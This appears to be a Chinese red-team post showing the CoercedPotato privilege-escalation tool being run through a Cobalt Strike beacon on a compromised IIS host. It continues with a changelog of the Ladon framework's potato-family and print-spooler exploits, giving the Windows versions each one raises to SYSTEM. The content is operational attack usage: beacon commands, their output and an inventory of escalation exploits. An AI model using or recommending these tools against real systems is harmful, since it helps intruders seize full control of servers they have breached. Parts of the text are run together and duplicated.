CoercedPotato提权Win10-Win2022

Win10Win11Win2016Win2019Win2022

Win11 22H2Microsoft Windows [Version 10.0.22621.1194]权限  iis apppooldefaultapppool

beacon> shell whoami[*] Tasked beacon to run: whoami[+] host called home, sent: 37 bytes[+] received output:iis apppooldefaultapppool

beacon> shell ver[*] Tasked beacon to run: ver[+] host called home, sent: 34 bytes[+] received output:
Microsoft Windows [Version 10.0.22621.1194]

beacon> shell CoercedPotato.exe -c whoami

shell CoercedPotato.exe -c whoamiLadon GetPipe

[u]BadPotato    本地提权 支持Base64参数 解决Cobalt Strike或LadonShell下双引号等问题[u]EfsPotato    本地提权 支持Base64参数 解决Cobalt Strike或LadonShell下双引号等问题[u]GodPotato    本地提权 支持Base64参数 解决Cobalt Strike或LadonShell下双引号等问题[u]SweetPotato    本地提权 支持Base64参数 解决Cobalt Strike或LadonShell下双引号等问题[u]McpPotato    本地提权 支持Base64参数 解决Cobalt Strike或LadonShell下双引号等问题[+]McpPotato    .NET>=4.0 Win11/2022提权至System  其它系统自测[u]SweetPotato  超时18秒，无需taskkill自身，免得IIS下提权把IIS进程干了 解决退出问题[u]LadonLpe2  152KB  放过时、使用不多、易被杀的提权EXP在Lpe2 如bypassUAC、打印机提权等 PrintNightmare SpoolFool PrintNotifyPotato ms16135LadonLpe    257KB  GodPotato[+]GodPotato  Win8-Win11/Win2012-2022提权 （测试2012 R2 iis apppooldefaultapppool权限 失败）WIN11网络服务成功[+]badpotato  win8以上才可用，相当于.net 4.0程序集: install_clr、uninstall_clr、clr_exec、clr_efspotato、clr_badpotato程序集: install_clr、uninstall_clr、clr_exec、clr_efspotato、clr_badpotato功能: info、xp_cmdshell、installclr、clr_exec、clr_efspotato、cls_badpotato功能: info、xp_cmdshell、installclr、clr_exec、clr_efspotato、cls_badpotato[+]PrintNotifyPotato 提权Win10-11 Win2012-Win2022   移除[+]EfsPotato Win7-2019提权(服务用户权限提到system)[+] SweetPotato Win7-2019提权(服务用户权限提到system)[+] BadPotato  PrintSpoofer/PipePotato提权(Win8-Win10/Win2012-2019)[+] BadPotato  PrintSpoofer/PipePotato提权(Win8-Win10/Win2012-2019)